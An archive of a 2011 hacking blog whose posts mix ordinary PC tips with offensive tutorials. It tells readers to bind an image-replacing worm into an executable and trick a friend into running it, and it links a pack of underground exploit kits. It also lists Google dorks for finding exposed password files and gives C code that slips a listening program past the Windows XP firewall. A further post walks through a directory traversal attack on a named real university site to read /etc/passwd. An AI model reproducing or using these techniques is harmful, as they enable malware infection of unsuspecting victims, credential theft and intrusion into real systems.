Monday, July 25, 2011

Image Hack: How to hack Images on friend’s computer

Image hack has been the missing part of this blog. So, I am posting Image Worm software developed by Nathan which you can use to hack images on remote computer.

Image Worm: Hack Images on friend’s computer:

1. Download Image Worm software to hack images on friend’s computer.
Password: techotoys.net
2. Run the Image Worm software to see:
Hack image Worm
3. Now, select any image on your computer. This image will be used to replace all the images on victim computer i.e. all the images on your friend’s computer will be changed to your selected image.
4. After selecting the image, hit on “Build Worm” and Image worm will create a server.exe file in current directory.
Note: Do not run this server.exe file on your own computer. I don’t know how to nullify the changes done by this image hack. If you want to try out on your computer, make sure you use Deep Freeze 6 software before running server.exe file.
5. Now, bind the server.exe file with any other .exe file using FUD binder software. Send this binded file to your friend and ask him to run it on his computer. After running, our server.exe file will silently install itself on victim computer and all his images will be changed to your image selected in Step 3.
6.a. Images before Image hack:
Hack image worm 1
6.b Images after Image hack:
Hack image worm 2
Thus, now you can see this image hacking software changes all images on victim computer. You are able to hack images on your friend’s computer thanks to Image Worm software.
Note: The server.exe file may take some time to hack images on remote computer. Also, on some computers, Image Worm is able to hack images present in “Pictures” folder. So, the working of Image worm to hack images varies according to computer.

26 Underground Hacking Exploit Kits available for Download !


List of Hacking Exploit Kits :

  • Unknow
  • Tor
  • Target-Exploit
  • Smart pack
  • RDS
  • My poly sploit
  • multisploit
  • mypack-009
  • mypack-091
  • mypack-086
  •  mypack-081
  • Mpack
  • Infector
  • Ice-pack-1
  • Ice-pack-2
  • Ice-pack-3
  • G-pack
  • Fire pack -1
  • Fire Pack -2
  • Fiesta -1
  • Fiesta -2
  • Cry 217
  • Armitage
  • Adpack -1
  • Adpack -2
  • 0x88


Download : http://www.multiupload.com/EFDCHHZ9ZD
Rar password : thn


Batch File Programming Ebook



Batch File programming refers to a batch file which are essentially sequences of DOS commands and are stored in a text file with an extension of “.BAT”.
Usually batch files are used to do repeated tasks i.e To do a regular task you do not need to type in the commands over and over again, instead you can 

create a batch file which consists set of commands, So when you execute it it will do your task automatically!

Why Do You Need to learn Batch Programming ?
Yes every user will get to this question because they don't know the real power of Batch Coding and many of them think that its only a funny thing which can do a few notepad tricks....
You have to believe that Batch Coding is widely used by hackers for some attacks like DNS poisoning, Creating Viruses, service Disabler, Bombers, Extension Changer, Keylogger remapper etc.., So if you really want to become a specialist in security stuff get to the basic and learn Batch File Programming.

So what are you waiting for Just download it now for FREE!

Reveal Hidden Password Using Asterisk Key

It’s a good practice not to use the same password on everything. This is because if your ONLY password falls in the wrong hands, the next thing you know is you won’t be able to access anything at all. Imagine you loose access to your Hotmail, GMail, Yahoo, Windows Live Messenger, Yahoo Messenger, Google Talk, Internet Bank account and etc. a day! You’ll go crazy loosing all your contacts and you know someone is having a great time reading all your personal emails.

For me, I use different password for softwares/websites and most of it is saved on my laptop for easy access. Problem is, if you use too many different passwords, sometimes we tend to forget the password that we set for the software or website. If the password is saved, you can easily use a tool to show the password hidden under the asterisk *******

I am sure many of you remember “SnadBoy’s Revelation” but unfortunately it doesn’t support showing passwords hidden under asterisks in web pages. So I won’t be recommending this tool because I know a better one.

Asterisk Key shows passwords hidden under asterisks. It is able to instantly uncover hidden passwords on password dialog boxes and web pages. The setup is less than 500KB and it works perfectly.

Reveal hidden password in Google Talk (Software)

Recover Lost Password

 

Reveal hidden password in Internet Explorer (Web Page)

Reveal Lost Password

 

Both Google Talk and Internet Explorer is active. I then launch Asterisk Key and click the “Recover” button. Within a second, Asterisk Key shows the passwords hidden under asterisks.

Show asterisk password

Just a word of advice, please use this tool to recover your OWN password. If you get caught in using this tool to steal people’s password, you can get into serious trouble. Treat this tool as a useful recovery too instead of hacking tool.

Note: Asterisk Key doesn’t reveal password hidden under asterisk in Firefox browser.

Download Asterisk Key here.

Enjoy HaCkInG.....

Top 5 Hack Tools for Hackers to Investigate Computer System

List of top 5 hack tools for hackers to Inverstigate or Forensic Computer system or PC:
1. Live View
2. Start up List
3. Open Files View
4. Wireshark
5. Helix 3

Working of above tools stepwise:
1. Live View
Live View is an open source utility that creates a virtual machine of the existing system. Live View creates a virtual disk out of the system that allows you to then safely investigate a copy of the system without interfering with anything installed. So you can easily investigate your system virtually without affecting the original system.
Now restart you PC for further investigations and tools to use.
You can download Live View for free here (Click here to download).

2. Start up List
Now you have a virtual copy of your system and now why you are waiting let's start investigating PC. So download the Start Up List (click here to download startup list).This is a great way to start the investigation of a system and determine what things might have potentially been put on the system to restart each time the system does. It will provide you the list of all programs that system use during the boot time. Great way to find the keyloggers and other remote montitoring tools as they are always added to start up. 
Now why i am saying this tool as you can directly do it using MSCONFIG command. Answer is as simple as question, msconfig only displays the list of programs that are attached to start up using registry keys. Normally what happens the viruses attach themself to some of the existing windows service so it will become difficult to identify its instances. Start up list displays all the back ground programs too. 

3. Open Files View
The next step in investigating your computer is to find or determine which other files, other than usual are open. In Linux we can directly do this using the ISOF command in the terminal but there is no similar command in windows. Ahhah now what will you do to investigate this.. Don't worry OpenFilesView is there(click here to download openfileview). Openfilesview is a Windows executable that lists all the files and processes that are active currently – both local and network based – on the system. So you can easily identify which unusual file is opened or which unusual process is running. Now how it helps, all keyloggers or remote administration tools always maintains a temporary file on which they write their logs or other details. Muahhhhhh... Now nothing is hidden from you. You can see each and everything and find out easily that which noob virus or keylogger is running on your system.

4. Wireshark
Mine favorite tool out of 5 tools. Now you have researched your system using above there tools, it time to investigate your network traffic. Several times it happens, when you install some software you doubt that it is sending your personal data or information to someone else. Wireshark is a tool that monitors your network packets and analyse them where its sending data. Now how its helpful for you, Most trojans and keyloggers sends logs using network and upload them to FTP or send them to some email address. Using wireshark you can monitor what they are sending and even the username and password of FTP and email accounts on which it is sending. This is the most promising factor that makes to love wireshark more. So why waiting download the wireshark for free: (Click here to download Wireshark).

5. Helix 3
Now you all will be thinks we have done everything, investigating is done...:D but i am Destructive Mind. So few more things are striking my mind. What more i can investigate in the PC. Any guesses...
Damn.. i forgot i was teaching you.. 
Now how will you determine what the noob viruses has changed in your system, which files they have edited or attached their signatures to which of the programs and most important what they have edited or added. This you can do with the help of Helix 3. Helix 3, a newly updated version of the live Linux forensics tool, can be used to examine the disk safely to see what has been finally changed. So guys now how classy you think you have become. But sorry to inform you that its the first part of hacker's life and i guranttee 99.99% guys doesn't know these tools. Ahhh... If they know about these tools then they surely doesn't know how to use them and more important if they know that also they probably never used them as they are LAZY enough and leave everything on noob antiviruses.
(Click here to download helix3)  Its a 30 day trial version guys, as licensed version is for one system only and i can't share mine :D. But i can tell you some awesome tricks to use it as much as you want. For downloading evalation version again and again just register with new email ID and remove the previous version using WinXP manager which removes registry keys also.

One more suggestion about these noob antiviruses, they detect only those viruses and trojans that are in their database, if a new virus has come then you have to wait till next database upgrade for getting it detected.

FIND ADMIN PANEL OF ANY WEBSITE

hii all so today i'll share you my way to find Admin Panel Of Any website to show you how a hacker or any idiot :D can find admin panelfrom any website !
so first of all Go to Google and search this words : www.websitename.com/robots.txt
Robots.txt is a text  file which is  add by admin on the site to tell search robots which pages that admin would like them not to visit while.
so as you can see above , there are many secret pages are hidden from search engines .like :administrator,images,templates,tmp etc ...
so by typing www.websitename.com/administrator you will find the admin panel of that site !
now, let's see the 2nd way to find admin panel ,
so lets talk about cPanel , so cPanel is a graphical user interface to control the whole website.
to get into cpanel it's very Easy , just type www.websitename.com:2082
you can replace the port numbers after the ":"

Port 2082  Cpanel default port
Port 2083  Cpanel over SSL
Port 2086  Cpanel Webhost Manager (default)
Port 2087  Cpanel Webhost Manager (with https)
Port 2095  Cpanel Webmail
Port 2096  Cpanel secure webmail over SSL
okay, so now third way

download this admin finder tool From Here


so guys, these are my poor ways to what's your's share it . :)
and Enjoy .....

STEALING PASSWORD WITH GOOGLE HACK

Google is a treasure trove full of important information, especially for the underground world. This Potential fact can also be utilized in the data for the username and password stored on a server.



If the administrator save important data not in the complete system authentifikasi folder, then most likely be reached by the google search engine. If data is successfully steal in by the unauthorized person, then the will be in misuse.

Here, some google search syntax to crawl the password:

1. "Login: *" "password =*" filetype: xls (searching data command to the system files that are stored in Microsoft Excel)

2. allinurl: auth_user_file.txt (to find files auth_user_file.txt containing password on server).

3. filetype: xls inurl: "password.xls" (looking for username and password in ms excel format). This command can change with admin.xls)

4. intitle: login password (get link to the login page with the login words on the title and password words anywhere. If you want to the query index more pages, type allintitle)

5. intitle: "Index of" master.passwd (index the master password page)

6. index of / backup (will search the index backup file on server)

7. intitle: index.of people.lst (will find web pages that contain user list).

8. intitle: index.of passwd.bak ( will search the index backup password files)

9. intitle: "Index of" pwd.db (searching database password files).

10. intitle: "Index of .. etc" passwd (this command will index the password sequence page).

11. index.of passlist.txt (will load the page containing password list in the clear text format).

12. index.of.secret (google will bring on the page contains confidential document). This syntax also changed with government query site: gov to search for government secret files, including password data) or use syntax: index.of.private

13. filetype: xls username password email (will find spreadsheets filese containing a list of username and password).

14. "# PhpMyAdmin MySQL-Dump" filetype: txt (will index the page containing sensitive data administration that build with php)

15. inurl: ipsec.secrets-history-bugs (contains confidential data that have only by the super user). or order with inurl: ipsec.secrets "holds shared secrets"

16. inurl: ipsec.conf-intitle: manpage (useful to find files containing important data for hacking)

17. inurl: "wvdial.conf" intext: "password" (display the dialup connection that contain phone number, username and password)

18. inurl: "user.xls" intext: "password" (showing url that save username and passwords in spread sheet files)

19. filetype: ldb admin (web server will look for the store password in a database that dos not delete by googledork)

20.inurl: search / admin.php (will look for php web page for admin login). If you are lucky, you will find admin configuration page to create a new user.

21. inurl: password.log filetype:log (this keyword is to search for log files in a specific url)

22. filetype: reg HKEY_CURRENT_USER username (this keyword used to look for reg files (registyry) to the path HCU (Hkey_Current_User))


In fact, there are many more commands that google can crawl in use in the password. One who has the ability google reveals in this case is http://johnny.ihackstuff.com. For that, visit the web to add insight about the google ability.

Here, some of the other syntax google that we need to look for confidential data :

"Http://username: password @ www ..." filetype: bak inurl: "htaccess | passwd | shadow | ht users"
(this command is to take the user names and passwords for backup files)

filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files (this command is to take the password information)

filetype:ini ws_ftp pwd (searching admin password with ws_ftp.ini file)

intitle: "Index of" pwd.db (searching the encrypted usernames and passwords)

inurl:admin inurl:backup intitle:index.of (searching directories whose names contain the words admin and backup)

“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD(WS_FTP configuration files is to take FTP server access passwords)

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-” (there is Microsoft FrontPage passwords)

filetype: sql ( "passwd values ****" |" password values ****" | "pass values ****") searching a SQL code and passwords stored in the database)

intitle:index.of trillian.ini (configuration files for the Trillian IM)

eggdrop filetype:user (user configuration files for the Eggdrop ircbot)

filetype:conf slapd.conf (configuration files for OpenLDAP)

inurl:”wvdial.conf” intext:”password” (configuration files for WV Dial)

ext:ini eudora.ini (configuration files for the Eudora mail client)

filetype: mdb inurl: users.mdb (potentially to take user account information with Microsoft Access files)

intext:”powered by Web Wiz Journal” (websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/)

“Powered by DUclassified” -site:duware.com "Powered by DUclassified"-site: duware.com
“Powered by DUcalendar” -site:duware.com "Powered by DUcalendar"-site: duware.com
“Powered by DUdirectory” -site:duware.com "Powered by DUdirectory"-site: duware.com
“Powered by DUclassmate” -site:duware.com "Powered by DUclassmate"-site: duware.com
“Powered by DUdownload” -site:duware.com "Powered by DUdownload"-site: duware.com
“Powered by DUpaypal” -site:duware.com "Powered by DUpaypal"-site: duware.com
“Powered by DUforum” -site:duware.com "Powered by DUforum"-site: duware.com 


intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com (websites that use DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, by default allows us to retrieve passwords file)

To DUclassified, just visit http:///duClassified/ _private / duclassified.mdb
or http:///duClassified/ or http:///duClassified/

intext: "BiTBOARD v2.0" "BiTSHiFTERS Bulletin Board" (Bitboard2 use the website bulletin board, the default settings make it possible to retrieve the passwords files to be obtained with the ways http:///forum/admin/data _ passwd.dat
or http:///forum/forum.php) or http:///forum/forum.php)

Searching for specific documents :

filetype: xls inurl: "email.xls" (potentially to take the information contact)

“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs "not for distribution"
 (confidential documents containing the confidential clause
buddylist.blt)

AIM contacts list AIM contacts list

intitle:index.of mystuff.xml intitle: index.of mystuff.xml

Trillian IM contacts list Trillian IM contacts list

filetype:ctt “msn” filetype: Note "msn"

MSN contacts list MSN contacts list

filetype:QDF
 (QDF database files for the Quicken financial application)

intitle: index.of finances.xls (finances.xls files, potentially to take information on bank accounts, financial Summaries and credit card numbers)

intitle: "Index Of"-inurl: maillog (potentially to retrieve e-mail account

Saturday, July 23, 2011

How to increase browsing speed: 7 ways to work faster on slow connections

Ever wonder how to make your Internet connection faster or how to increase browsing speed? If you are trying to get things done, there is nothing like a slow connection to thwart your best efforts. But there are things you can do to browse faster—even when your Internet connection is working slowly.
This article will show you how to increase your productivity when your connection is slow. Many of these steps are also good tips for how to increase the speed of browsing and of sending and receiving email.

1. Send multiple files faster by compressing them

If you're sending multiple files—for example, several files related to a single project—you can reduce their combined size by using a compression utility. Compressing your files can dramatically reduce the time needed to send files online, and compressed files don't take up as much space in your (or the recipient's) email Inbox. WinZip is one of the more common compression tools.

Compress files


2. Increase browsing speed by turning off graphics in Windows Internet Explorer

Graphics are important to web pages, but they also take time to download if you're online. You can turn them off to speed your Internet browsing.

Disable graphics in Internet Explorer

1.   On the Tools menu, click Internet Options.
2.   In the Internet Options dialog box, click the Advanced tab.
3.   In the Settings box, scroll down to the Multimedia section. Clear the
      following check boxes.
  •  Play animations in web pages
  •  Play sounds in web pages
  •  Play videos in web pages
     Note: This option is available in Internet Explorer versions before
     Internet Explorer 8.
  •  Show pictures
4.   Click Apply.
Internet Options dialog box, Advanced tab, with Settings check boxes selectedTo turn graphics on again, on the Tools menu, in the Internet Options dialog box, on the Advanced tab, under Multimedia, select the same check boxes, and then click Apply.

3. Send email using Contact Groups (Distribution Lists)

If you're sending an email to multiple people, create a Contact Group (previously known as a Distribution List) instead of listing each recipient separately. Messages are sent more quickly and efficiently when you're using a Contact Group. Your company may have established procedures for creating mailing lists. If not, learn how to create and edit a Contact Group in Microsoft Outlook.

4. Reduce email size with simple email signatures

Email signatures leave a professional stamp on your messages, but elaborate signatures that include multiple images take up a lot of unnecessary storage space in each email. Ultimately, they can slow down the time needed to send each message. Instead, create distinctive text signatures combining fonts, type sizes, and colors to make your email signature smaller and quicker to transmit and receive. Learn how to create email signatures in Microsoft Outlook.

5. Work offline using Cached Exchange Mode in Outlook

Even if you lose your network connection, you can continue working in Microsoft Outlook if you're using Cached Exchange Mode. With Cached Exchange Mode, a copy of your mailbox is stored on your computer. This copy provides quick access to your data and is frequently updated with the mail server. If you work offline, whether by choice or due to a connection problem, your data is still available to you instantly wherever you are. Cached Exchange Mode does require you to work with a Microsoft Exchange Server email account. Learn more about using Cached Exchange Mode.

6. Browse offline by saving web pages on your computer

If you use or reference a specific webpage often, save it locally to your computer. If you lose your connection or are working on a slow connection, you'll still be able to read and find the information you need.

Save a web page on your computer

  1. In Internet Explorer, go to the web page you want to save.
  2. On the Page menu, click Save As.
  3. In the Save As type drop-down menu, select web page, complete.
  4. Select the location where you want to save the webpage.
  5. Click Save.

7. Open webpages faster by increasing your cache

If you increase the size of the temporary Internet files cache in Internet Explorer, your computer won't have to work so hard when you revisit webpages. Many of the images will already be downloaded on your computer, decreasing the amount of time it takes to open a page.

Thursday, July 21, 2011

Make Your Computer Login Screen Like FBI Tunnel



[Image: img20110327121913.jpg]



Step 1 : Download Logon Studio ,

Image

LogonStudio 1.7 | 7Mb

Information:

Longing for some change in your life? Why not start with that boring old Windows XP logon screen? With the freeware LogonStudio, choosing another screen is a matter of two clicks. Alternately, you can design your own with a built-in editor.
The first option is a lot easier. About 30 cool screens are available on the WinCustomize site, and the program can randomly select one on every boot. Editing is less straightforward. You build or modify logon screens by tweaking parameters on a lengthy list of elements. So you might, for instance, change the FirstColor parameter of the Centre Panel element to a new shade of blue. This allows you to customize everything from background to letterings to buttons, but beginners will find the process quite confusing. The sketchy online help isn't much assistance, either.


Download For Windows Vista(Works With WIndows 7 too)


Download For WindowsXp:


2, Download FBI Files From Here:


3, iF YOU WANT TO REMOVE SWITCH USER BUTTON THEN YOU CAN DO WITH THIS REGISTERY TWEAK.


How to Bypass Windows XP Firewall using C program.

Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% workinghack and its basically an exploit in windows XP.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-
#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h" 
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
 
struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello 
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

Prevent identity theft and fraud with Identity Finder



With hard disks getting bigger in size and thousands of files in our computers it is easy to leave behind personal data that could be used for identity theft, Identity Finder stops the risk of data leakage by finding and securing private information, it would be a good idea to run something like this on your hard disk before taking your laptop to the repair shop or allowing anyone who is not your family access to your computer.
Identity Finder will scan your computer files searching credit card numbers, dates of birth, passwords, bank account numbers, driver license, phone numbers and other personal data that is often used by identity thieves, it can be used to search for country specific data like the Canadian SIN numbers, British NHS identification and Australian TFN account numbers.
After the scan the software will show you all of the data it has found on a detailed preview pane with statistics and it will offer to securely wipe it using US Department of Defense standards (DOD 5220.22-M), any wrongly classified data can be filtered out from future scans by marking it as ignore, if you need to have the data in your computer you don’t necessarily have to erase it and can use Identity Finder to encrypt it, the applications integrates with Windows Explorer creating context menu options for easy access.
Some of the locations that will be scanned for sensitive data include the Internet browser temporary files (IE and Firefox), cookies, messenger logs, text documents (.docx.pdf, .txt, .rtf.html), compressed files (.zip, .gzip, .rar, .bzip), email messages (Windows Mail, Thunderbird, Outlook Express) and others.
Identity Finder to stop credit card fraud
Identity Finder to stop credit card fraud
Identity theft contains all of the tools that are needed by those not using full disk encryption, a secure data wiper, file encryption and a password manager with the ice on the cake being the hard disk scanning for unsecured data useful to identity thieves. The free edition of this software is pretty basic, it comes with a data shredder and it only scans for credit card numbers and passwords, if you want the whole suite with all of the features you will have to buy it.

Hack a website using Directory Transversal attack?

What is root directory of web server ?

It is a specific directory on server in which the web contents are placed and can be seen by website visitors. The directories other that root may contain any sensitive data which administrator do not want visitors to see. Everything accessible by visitor on a website is  placed in root directory. The visitor can not step out of root directory.

what does ../ or ..\ (dot dot slash) mean  ? 

The ..\ instructs the system to go one directory up. For example, we are at this locationC:\xx\yy\zz. On typing ..\ , we would reach at C:\xx\yy.

Again on typing ..\ , we would rech at C:\xx .



Lets again go at location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt . Typing ..\ two times would take us two directories up (that is to directory xx) where abc.txt is placed.

Note : Its ..\ on windows and ../ on UNIX like operating syatem.

What is Directory Transversel attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is  to access sensitive files placed on web server by stepping out of the root directory using dot dot slash .

The following example will make clear everything

Visit this website vulnerable to directory transversal attack

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This webserver is running on UNIX like operating system. There is a directory 'etc' on unix/linux which contains configration files of programs that run on system. Some of the files are passwd,shadow,profile,sbin  placed in 'etc' directory.

The file etc/passwd contain the login names of users and even passwords too.

Lets try to access this file on webserver by stepping out of the root directory. Carefully See the position of directories placed on the webserver.

We do not know the actual names and contents of directories except 'etc' which is default name , So I have
marked them as A,B,C,E or whatever.

We are in directory in F accessing the webpages of website.


Lets type this in URL field and press enter

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search the directory 'etc' in F. But obviously, there is nothing like this in F, so it will return nothing

Now type
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd
Now this will step up one directory (to directory E ) and look for 'etc' but again it will returnnothing.

Now type 

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd
Now this will step up two directories (to directory D ) and look for 'etc' but again it will return nothing.

So by proceeding like this, we we go for this URL
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the main drive and then to 'etc' directory and show us contents of 'passwd' file.
To understand the contents of 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format


You can also view etc/profile ,etc/services and many others files like backup files which may contain sensitive data. Some files like etc/shadow may be not be accessible because they are accesible only by privileged users.

Note- If proc/self/environ would be accessible, you might upload a shell on serverwhich is called as Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user's input